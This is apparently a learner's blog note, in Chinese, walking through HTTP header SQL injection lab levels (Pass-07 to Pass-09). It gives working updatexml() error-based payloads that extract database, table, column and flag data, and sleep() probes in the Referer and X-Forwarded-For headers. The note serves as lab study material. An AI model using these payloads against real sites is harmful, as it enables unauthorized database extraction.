head请求_SQL注入-HEAD注入(学习笔记)

HEAD注入原理

就是在传参的时候,将我们的数据构建在http头部。

超全局变量

PHP 中的许多预定义变量都是“超全局的”,这意味着它们在一个脚本的全部作用域中都可用。

$_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取了
$_POST (获取POST传参)
$_GET (获取GET的传参)
$_COOKIE (获取COOKIE的值)
$_SERVER (包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组)
$_SERVER功能强大。
常用的:
$_SERVER[‘HTTP_HOST’] 请求头信息中的Host内容,获取当前域名。
$_SERVER[“HTTP_USER_AGENT”] 获取用户相关信息,包括用户浏览器、操作系统等信息。
$_SERVER[“REMOTE_ADDR”] 浏览网页的用户ip。

Pass-07

1.首先判断是否存在head注入点

用BURP抓个包

1cb375d2b5f13d56a478848c4b01b0e1.png


使用Modify Headers谷歌浏览器插件进行测试
如果回显错误说明存在head注入

1dcaf7cfd348e07435a2b5225b953264.png

609dc7858eca90a66c564c2a4a83ba75.png

2.查询当前所在库的库名

使用updatexml()函数

‘ or updatexml(1,concat(0x7e,(select database())),1),1)#

60805c9ff1f8ddd6f1a67375a07f25fd.png

5493c99a58b892599cf34c77d9ced7f0.png

3.查询表名

查询到表名

‘ or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.columns where table_schema=database())),1),1) #

621701c45cae518719ec60e8c7ac22a2.png

4.查询字段名

‘ or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=’flag_head’)),1),1) #

30e761d1088bc2e379973a9fa6afb8ec.png

5.查询数据,拿到flag

‘ or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1) #

e68298892cf059b184a2462d5fba7341.png


不知道为啥 我提交后面两个不管用,提示flag错误(lll¬ω¬)

00ef392b7af5156c9fb46b72d178ff01.png

Pass-08

1.寻找head注入点

通过抓包,并修改referer: ‘ or sleep(5),1)
回显错误

deb09a4180093cbad1ba5baa6de3b8ae.png


判断出注入点在referer:
后续操作与前面一致

Pass-09

使用Modify headers插件添加X-Forwarded-For,插入' or sleep(5),1)
回显错误

441497ab95da9883bed446cd98ba7beb.png


确定存在注入点,后续操作与其他head注入一致

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值